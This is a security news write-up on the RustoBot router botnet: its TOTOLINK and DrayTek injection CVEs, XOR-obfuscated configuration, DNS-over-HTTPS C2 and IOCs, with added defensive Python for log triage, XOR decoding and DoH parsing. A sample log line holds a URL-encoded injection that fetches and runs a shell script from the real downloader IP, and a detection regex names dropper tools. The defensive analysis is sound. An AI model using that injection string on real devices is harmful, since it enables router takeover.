Rust-Coded Botnet Targets Routers for Remote Command Injection

FortiGuard Labs has uncovered a new botnet, dubbed “RustoBot,” that is written in Rust, an increasingly popular systems programming language, and targets vulnerable network devices.

RustoBot is notable for the choice of Rust: its cross-platform toolchain lets one codebase target the many CPU architectures found in embedded devices, and its compiled output is less familiar to analysts than the C-based binaries typical of IoT botnets, which slows reverse engineering.

The campaign exploits known command injection vulnerabilities in TOTOLINK routers and in certain DrayTek devices, allowing attackers to execute arbitrary commands on the device and take control of it.

Vulnerability Exploitation and Infection Vector

RustoBot exploits command injection vulnerabilities such as CVE-2022-26210 and CVE-2022-26187 in the cstecgi.cgi component of TOTOLINK routers, and the recently disclosed CVE-2024-12987 in DrayTek Vigor2960 and Vigor300B devices.

Figure: RustoBot entry point

Attackers deliver the malware with a set of downloader scripts that retrieve the payload using either wget or tftp. The bot is built for a range of embedded architectures: arm5, arm6, arm7, mips and mpsl (MIPS little-endian), with an x86 variant also observed.

The downloaders are hosted on compromised web servers, and the observed victims are located in Japan, Taiwan, Vietnam and Mexico.

Upon execution, the downloader fetches the appropriate Rust-based binary for the victim’s architecture and initiates the infection process, ultimately handing over device control to the threat actor.
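The infection chain above leaves a recognizable trail in web-server and proxy logs: a management-CGI request carrying shell metacharacters, followed by fetches from the downloader host and connections to the C2 names. The following is an added example (not code from FortiGuard Labs or from the malware) that triages log lines against the indicators in this article's IOC table. The log lines are constructed, and the query parameter `example` is a placeholder, not the vulnerable parameter of any CVE named here.

```python
"""Triage web-server or proxy log lines for RustoBot-style activity.

Added example for this article, not code from FortiGuard Labs or the malware.
The log lines are constructed; the query parameter "example" is a placeholder
and is not the vulnerable parameter of any CVE the article names.
"""
import re
from urllib.parse import unquote

# Indicators taken from the article's IOC table, with defanging removed.
DOWNLOADER_HOST = "66.63.187.69"
C2_INDICATORS = (
    "dvrhelper.anondns.net",
    "techsupport.anondns.net",
    "rustbot.anondns.net",
    "miraisucks.anondns.net",
    "5.255.125.150",
)

# Shell metacharacters and dropper verbs that never belong in a router
# management request. Checked after URL-decoding, so %3B is caught as ';'.
INJECTION_RE = re.compile(r"[;|`$]|\b(?:wget|tftp|curl|chmod|busybox)\b|/tmp/")
# Request line inside a Common Log Format or proxy log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|CONNECT) (\S+) HTTP/')


def classify(line):
    """Return the reasons a log line looks suspicious (empty list if clean)."""
    reasons = []
    match = REQUEST_RE.search(line)
    if not match:
        return reasons
    target = unquote(match.group(1))
    lowered = target.lower()
    cgi_at = lowered.find("cstecgi.cgi")
    if cgi_at != -1 and INJECTION_RE.search(target[cgi_at:]):
        reasons.append("shell metacharacters in cstecgi.cgi request")
    if DOWNLOADER_HOST in target:
        reasons.append("reference to RustoBot downloader host")
    for indicator in C2_INDICATORS:
        if indicator in lowered:
            reasons.append(f"contact with C2 indicator {indicator}")
    return reasons


def triage(lines):
    """Return [(line_index, reasons)] for every line with at least one hit."""
    hits = []
    for index, line in enumerate(lines):
        reasons = classify(line)
        if reasons:
            hits.append((index, reasons))
    return hits


# Constructed sample: two benign router requests, one injection attempt that
# pulls the downloader, one proxy CONNECT to a C2 name, one direct payload fetch.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2025:10:00:01 +0000] "GET /cgi-bin/cstecgi.cgi?action=login HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2025:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2025:10:01:13 +0000] "GET /cgi-bin/cstecgi.cgi?example=%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F66.63.187.69%2Fwget.sh%3Bsh%20wget.sh HTTP/1.1" 200 12',
    '10.0.0.1 - - [01/Jan/2025:10:02:00 +0000] "CONNECT rustbot.anondns.net:443 HTTP/1.1" 200 0',
    '10.0.0.1 - - [01/Jan/2025:10:02:05 +0000] "GET http://66.63.187.69/mips HTTP/1.1" 200 61440',
]

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_LOG):
        print(f"line {index}: {'; '.join(reasons)}")
```

The metacharacter check is deliberately applied only to requests that reach the CGI endpoint named in the article, so ordinary traffic containing a semicolon elsewhere does not page anyone; the IOC matches apply to every request line.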

Technical Execution and Obfuscation Tactics

Once installed, RustoBot employs several techniques to hinder detection and analysis.

Its configuration data is obfuscated with XOR using a key embedded in the binary (obfuscation rather than encryption: it defeats casual string extraction, not an analyst who locates the key), and library functions are called indirectly through the Global Offset Table (GOT), so the imports the bot relies on do not stand out in a static listing.

Combined with the large, heavily inlined binaries and mangled symbol names that the Rust toolchain produces, this slows static analysis; Rust's memory-safety guarantees themselves are a property of the source code and are not an evasion feature.

The decoded configuration drives two main routines: contacting the command-and-control (C2) servers and carrying out distributed denial-of-service (DDoS) attacks.

Figure: Decoder key
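The decoder-key figure illustrates why XOR obfuscation only slows an analyst down: when the key is a single repeating byte, it can be recovered from the ciphertext alone by scoring all 256 candidates against the alphabet a C2 configuration is expected to use. The block below is an added example written for this article, not code from the RustoBot sample or from FortiGuard Labs; it assumes a single-byte key and NUL-separated strings (the real sample's key length and layout may differ), and the sample blob, including the key 0x5A, is constructed.

```python
"""Recover a single-byte-XOR obfuscated configuration blob.

Added example for this article, not code from the RustoBot sample or from
FortiGuard Labs. It assumes a single-byte repeating key and NUL-separated
strings; the real sample's key length and layout may differ.
"""
import re

# Byte classes a C2 configuration is expected to consist of (hostnames,
# IPv4 addresses, ports, URL paths, NUL separators). Candidate keys are
# scored by how many decoded bytes fall in this alphabet.
EXPECTED = set(b"\x00abcdefghijklmnopqrstuvwxyz0123456789./:")


def xor_bytes(data, key):
    """XOR every byte with a single-byte key (symmetric: encode == decode)."""
    return bytes(b ^ key for b in data)


def score(candidate):
    """Count decoded bytes that fall in the expected configuration alphabet."""
    return sum(1 for b in candidate if b in EXPECTED)


def recover_key(blob):
    """Brute-force all 256 single-byte keys and keep the best-scoring one.

    Any wrong key maps at least one NUL separator or one letter outside the
    alphabet, so with a few letters and a separator present the true key
    scores strictly highest.
    """
    best_key, best_score = 0, -1
    for key in range(256):
        current = score(xor_bytes(blob, key))
        if current > best_score:
            best_key, best_score = key, current
    return best_key


def decode_config(blob):
    """Return (key, list of NUL-separated strings) for an obfuscated blob."""
    key = recover_key(blob)
    plain = xor_bytes(blob, key)
    fields = [f.decode("ascii", "replace") for f in plain.split(b"\x00") if f]
    return key, fields


HOSTNAME_RE = re.compile(r"^[a-z0-9.-]+\.[a-z]{2,}$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def c2_indicators(fields):
    """Pick out decoded fields that look like hostnames or IPv4 addresses."""
    return [f for f in fields if HOSTNAME_RE.match(f) or IPV4_RE.match(f)]


# Constructed test data: a plausible configuration using hosts from the
# article's IOC list, obfuscated with an arbitrary key chosen for this example.
SAMPLE_KEY = 0x5A
SAMPLE_PLAINTEXT = (
    b"rustbot.anondns.net\x00techsupport.anondns.net\x005.255.125.150\x00443"
)
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    key, fields = decode_config(SAMPLE_BLOB)
    print(f"recovered key 0x{key:02x}")
    for field in fields:
        print("  ", field)
```

A multi-byte repeating key is handled the same way once the key length is known (split the blob into that many interleaved columns and solve each column as above); that extension is left out here because the article does not state the sample's key length.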

For C2 communication, RustoBot resolves its C2 hostnames with DNS-over-HTTPS (DoH), so the lookups travel inside HTTPS sessions rather than as plaintext DNS queries that network monitoring on UDP/53 would see.

The bot resolves several hostnames (see the IOC list) that all point to the same C2 address, 5[.]255[.]125[.]150; spreading the infrastructure across multiple names means the takedown of any one name is less disruptive to the operator.
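What DoH hides is only the transport: inside the HTTPS request is an ordinary DNS wire-format message (RFC 8484), which is exactly what a resolver-side log or a TLS-terminating proxy would see. The block below is an added example written for this article, not RustoBot's code; it builds the query the bot would have to send for one of the C2 names in the IOC list, encodes it the way the RFC 8484 GET form does, and parses a constructed resolver answer. The resolver URL and the answer bytes are assumptions made for the example.

```python
"""Build and parse the DNS wire-format messages that travel inside DoH (RFC 8484).

Added example for this article, not code from RustoBot or FortiGuard Labs.
The resolver URL and the response bytes are constructed for the example.
"""
import base64
import struct


def encode_name(name):
    """Encode a dotted name as DNS labels: length byte + label, ending in 0."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qtype=1, txid=0):
    """Standard query: flags RD=1, one question, A record (qtype 1), IN class."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def doh_get_url(resolver, name):
    """RFC 8484 GET form: base64url without padding; txid 0 keeps URLs cacheable."""
    query = build_query(name)
    param = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return f"{resolver}?dns={param}"


def decode_doh_param(param):
    """Inverse of the ?dns= encoding: restore padding, then base64url-decode."""
    return base64.urlsafe_b64decode(param + "=" * (-len(param) % 4))


def parse_name(msg, off):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:  # compression pointer into the message
            pointer = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = parse_name(msg, pointer)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length


def parse_response(msg):
    """Return (question name, list of IPv4 strings from A records)."""
    _, _, _, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    qname, off = parse_name(msg, 12)
    off += 4  # skip qtype and qclass
    answers = []
    for _ in range(ancount):
        _, off = parse_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append(".".join(str(b) for b in rdata))
    return qname, answers


def build_response(query, ips, ttl=300):
    """Constructed resolver answer (not captured traffic): echo the question,
    set QR/RD/RA, and add one A record per IP using a pointer to the qname."""
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(ips), 0, 0)
    rrs = b""
    for ip in ips:
        rdata = bytes(int(octet) for octet in ip.split("."))
        rrs += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + rrs


C2_NAME = "rustbot.anondns.net"  # from the article's IOC list
C2_IP = "5.255.125.150"          # from the article's IOC list
RESOLVER = "https://doh.example/dns-query"  # assumed; any DoH resolver works

if __name__ == "__main__":
    url = doh_get_url(RESOLVER, C2_NAME)
    print("GET", url)
    answer = build_response(build_query(C2_NAME), [C2_IP])
    print("resolver answers:", parse_response(answer))
```

The practical consequence for defenders is that the C2 hostname appears neither in UDP/53 traffic nor in the TLS SNI of the resolver connection (which names the resolver, not the target), so detection has to rely on resolver logs, TLS inspection, or the later connection to the C2 IP itself.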

RustoBot's C2 server issues attack commands that specify the DDoS method (UDP, TCP or raw IP flooding), the attack duration, the target IP address and port, and the packet size.

This precision allows attackers to craft high-impact, targeted DDoS campaigns against selected IPs or services, leveraging the bandwidth and connectivity of compromised routers.

Because the bot runs with full control of the router and hides its C2 resolution in encrypted traffic, a compromised device is also positioned for data exfiltration or secondary attacks, although the analysis describes only the C2 and DDoS routines.

Organizations running the affected TOTOLINK or DrayTek devices should apply available firmware updates, keep device management interfaces off the public internet and behind strong authentication, and monitor for unexpected outbound connections or DNS-over-HTTPS traffic originating from routers.

According to the report, FortiGuard protections are in place for the known exploit vectors, and blocking traffic to the C2 domains and IP address listed below is strongly recommended.

Network segmentation that isolates edge devices, monitoring of their traffic, and user training further reduce exploitation risk.

IoT and edge devices remain attractive, often-overlooked targets for sophisticated botnet operations such as RustoBot.

Proactive mitigation, threat intelligence, and multi-layered defense are crucial to withstand these evolving threats.

Indicators of Compromise (IOC)

URLs (downloader host):
  hxxp://66[.]63[.]187[.]69/w.sh
  hxxp://66[.]63[.]187[.]69/wget.sh
  hxxp://66[.]63[.]187[.]69/t
  hxxp://66[.]63[.]187[.]69/tftp.sh
  hxxp://66[.]63[.]187[.]69/arm5
  hxxp://66[.]63[.]187[.]69/arm6
  hxxp://66[.]63[.]187[.]69/arm7
  hxxp://66[.]63[.]187[.]69/mips
  hxxp://66[.]63[.]187[.]69/mpsl
  hxxp://66[.]63[.]187[.]69/x86

C2 hosts:
  dvrhelper[.]anondns[.]net
  techsupport[.]anondns[.]net
  rustbot[.]anondns[.]net
  miraisucks[.]anondns[.]net
  5[.]255[.]125[.]150

Hashes (downloader, SHA-256):
  76a487a46cfeb94eb5a6290ceffabb923c35befe71a1a3b7b7d67341a40bc454
  75d031e8faaf3aa0e9cafd5ef0fd7de1a2a80aaa245a9e92bae6433a17f48385
  fbdd5cba193a5e097cd12694efe14a15eb0fc059623f82da6c0bf99cbcfa22f8
  0dde88e9e5a0670e19c3b3e864de1b6319aaf92989739602e55b494b09873fbe

Hashes (RustoBot, SHA-256):
  15c9d7a63fa419305d7f2710b63f71cc38178973c0ccf6d437ce8b6feeca4ee1
  427399864232c6c099f183704b23bff241c7e0de642e9eec66cc56890e8a6304

Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
